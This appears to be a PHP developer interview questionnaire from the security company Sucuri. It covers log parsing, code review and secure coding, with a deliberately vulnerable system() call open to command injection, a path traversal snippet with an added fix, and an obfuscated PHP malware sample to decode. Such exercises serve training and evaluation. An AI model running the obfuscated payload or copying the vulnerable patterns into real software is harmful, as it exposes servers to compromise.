Developer Interview Questions

Thanks for your interest in working with Sucuri. Do you mind answering these questions to help us evaluate your PHP/development experience? There is no right or wrong answer; it is more for us to get a better understanding of where you are. Please send your responses to jobs@sucuri.net.

Technical Questions

1-PHP basics

Our applications generate a lot of logs. Sometimes we need to write quick PHP scripts to parse them and generate simple reports. This is a log dump from one web server:

HTTP logs (1).txt

Can you download it and write a quick PHP script to read/parse the results and generate a simple report from it? Nothing fancy, but it would need to list the total number of entries found, how many of them were errors or successes (based on the HTTP return code), which files were visited most often, and the most popular referers (and their %'s too).

Bonus: List the top user agents (and their %'s) and try to separate any malicious request from the "good" ones.

2-PHP code analysis

You are working on a specific code base and you see this entry:

if(isset($_POST['email']))
{
    $email_input = trim(htmlspecialchars($_POST['email']));
    // Run email command to notify user of account creation
    system("/opt/app/accounts/notifynew.sh $email_input");
}

Do you see any performance or security issues in there? Would you rewrite it? Why? How?

3-PHP decoding

Sometimes, to write code that detects malware, we also need to be able to decode it. Can you decode this piece of code and let us know what it does? What would you do to automate decoding such code when parsing a PHP file?

/*amOmMQfUYVN0OxwwRjomMCHT1A0KOZXoCl 2wjQHwPWkBI2lxexzlHpmH12gOgizxwrkV INEsONk1AEozqvfS3WJZkp8aduIDGFvOS18hDhXDmC4S kqvuFWaCx4x674BsHUiF2lmPoORhhF8Hws32FS LrxIkz1sJZxBAaQpoiNLoKTa3MR9eM1q4ozedpNmEBnFb5uG */ //miBy10TC1A7ezb8fokkqNqHIaOlZhthJ $IPwXsveV='p'. 'reg_replac'.'e'; $ivAqSMVn="rbjfxy6ilF1hhrbHIo3"^"\x5d\x1b\x22\x02\x283c9\x2b3y\x0c\x1b\x1a\x2e\x10\x04\x40V"; $IPwXsveV($ivAqSMVn, "P2aIsq04NK9Ymr8IIz6AuNiV8WclRl6hcVpKCoEPyDnbulj3ae4Lrchpy0RGkMnDhTNk8S1wVeNGFx0fR4r0VOpKN7QyI42qMFQKXG8skLyp9xLQr4QCH6MV2cJAWAqjF8udDrLo4AU3ygIfZZhgUu3MMBMjC3IHz3l4kwhdx3VmYeHx4pU"^"5D\x00\x25\x5bSYRf\x22J\x2a\x08\x06\x10\x15\x15\x5ei\x13\x30\x1f\x3c\x13k\x038K1\x04\x115JvVmcG\x284Ll2\x3eQ38v\x30\x30q\x1f\x268O\x13\x11\x17\x0fnKpSdO\x60\x2dX\x0a7\x05N2Wws\x7fOQ\x044V\x40UezAy\x2d\x072\x1a\x2d\x02\x0b\x14\x7eaxk\x7ea\x18\x1a\x18\x3f\x1c\x04\x11\x24\x10u\x2df\x14\x12\x1ds\x1e\x02iD\x3a\x29\x27\x1e\x12\x05\x22\x5dR9m\x5bl\x14\x14\x24\x23R\x15O\x15\x3a\x7e\x05\x3a\x22\x04\x20v\x1e\x19\x19j\x1a\x2bC\x16\x2b\x15W\x09\x136\x5eSD\x1dK\x3f\x19qLsXIR\x7c", "yHdPJUPGuHdshLXM");

4-Secure Coding practices

When building an authentication system, how would you store the user passwords? Let's say we have a form to create an account and that is passing the user + pass via POST:

$_POST['user']
$_POST['pass']

Now we need a function to store them securely. How would you write that function?

5-Dev ops

You just pushed some changes to the server and now all pages are giving a 503 (internal server error). What steps would you take to fix the error and understand what is going on?

6-Code review

Do you see anything wrong with this code? It was found inside a PHP file that we were reviewing.

<?php
if(isset($_GET['page']))
{
    $_GET['page'] = htmlspecialchars($_GET['page']);
    echo '<title>'.$_GET['page'].'</title>';
}
else
{
    $_GET['page'] = "index";
    echo '<title>Welcome to site </title>';
}

$content = file_get_contents("/site/content/".$_GET['page']);
echo htmlspecialchars($content);
..

If there is an issue, how would you fix it?
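
One way to approach the fix, as an added example that is not part of the original questionnaire or Sucuri's code: htmlspecialchars() leaves "../" untouched, so the file read in the snippet above can leave /site/content/. The sketch restricts the page name to an allowlisted format and checks that the resolved path stays inside the content directory. The function name resolve_content_path and the temporary directory layout are assumptions constructed for the demo.

```php
<?php
// Added example: resolve a user-supplied page name to a file that is
// guaranteed to live inside the content directory, or return null.
function resolve_content_path(string $baseDir, string $page): ?string
{
    // Allowlist the name format first: letters, digits, '_' and '-' only.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $page) !== 1) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves symlinks and '..'; it returns false if the file is missing.
    $path = realpath($base . DIRECTORY_SEPARATOR . $page);
    if ($path === false || !is_file($path)) {
        return null;
    }
    // Containment check: the resolved path must still be under $base.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed sample data so the script runs offline.
$root = sys_get_temp_dir() . '/review_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/content', 0700, true);
file_put_contents($root . '/content/index', 'Welcome <b>home</b>');
file_put_contents($root . '/secret.txt', 'not for visitors');

foreach (['index', '../secret.txt', 'index%00', 'missing', ''] as $page) {
    $path = resolve_content_path($root . '/content', $page);
    if ($path === null) {
        printf("%-16s => rejected (would be a 404)\n", var_export($page, true));
        continue;
    }
    printf("%-16s => %s\n", var_export($page, true),
        htmlspecialchars(file_get_contents($path), ENT_QUOTES, 'UTF-8'));
}

// Clean up the constructed files.
unlink($root . '/content/index');
unlink($root . '/secret.txt');
rmdir($root . '/content');
rmdir($root);
```

Output encoding with htmlspecialchars() still applies when the content is echoed; it protects the HTML context, while the path check protects the filesystem lookup.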

7-Presentation

Based on your responses from question #1, how would you present it to the end user in a dashboard to summarize your findings?


Please send your responses to jobs@sucuri.net.